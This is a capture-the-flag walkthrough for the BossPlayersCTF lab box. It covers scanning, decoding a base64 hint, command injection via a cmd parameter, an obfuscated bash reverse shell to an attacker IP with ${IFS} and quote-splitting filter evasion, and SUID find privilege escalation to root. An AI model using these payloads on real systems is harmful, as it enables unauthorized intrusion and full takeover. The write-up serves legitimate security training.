# BossPlayersCTF ## Nmap ``` sudo nmap 192.168.152.20 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Port 80 shows the following page. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-257e517c987e3fc549e24733676d7dda94a490f7%2Fimage.png?alt=media) Viewing the source code of this page reveals text at the end. ``` WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK ``` We can take this string and run it through base64. We need to perform this three times to reveal a plain text string. ``` echo 'WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK' | base64 -d echo 'ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K' | base64 -d echo 'd29ya2luZ2lucHJvZ3Jlc3MucGhwCg==' | base64 -d ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2d866fbcb932ad4fd64229c26d42d59026dc9194%2Fimage.png?alt=media) Browsing to workingprogress.php: ![/workingprogress.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-28861ed6d5b0ff4ebff035cd191123206788916c%2Fimage.png?alt=media) Looking at the comment regarding ping we can take a guess for command injection on the current page. Appending ?cmd=(command) generates results. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fbbc8185a9cbf73a19535d10a87c11d0d48a403c%2Fimage.png?alt=media) To create a reverse shell run the following command in a terminal: ``` echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' ``` Then take the base64 output and run it as a command in the web browser. ``` http://192.168.152.20/workinginprogress.php?cmd=echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqRTFNaTg0TUNBd1BpWXhDZz09Cg==|ba%27%27se%27%276%27%274${IFS}-%27%27d|ba%27%27se%27%2764${IFS}-%27%27d|b%27%27a%27%27s%27%27h ``` This will create a reverse shell connection on our `netcat` listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5d7236f01823456be4d242454316609b71dcc6e9%2Fimage.png?alt=media) I then transferred `linpeas` over from my attacking machine. Shortly after running linpeas finds that the binary 'find' has the SUID bit set. Checking this against [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) shows we can use this to gain a root shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84d3b51179b22ee83dcf33efec6062f9e5fc1c30%2Fimage.png?alt=media) Run the following command to spawn a root shell: ``` /usr/bin/find . -exec /bin/sh -p \; -quit ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-52b5a56ff22b7861c930ee9a3a2b22b316548f55%2Fimage.png?alt=media)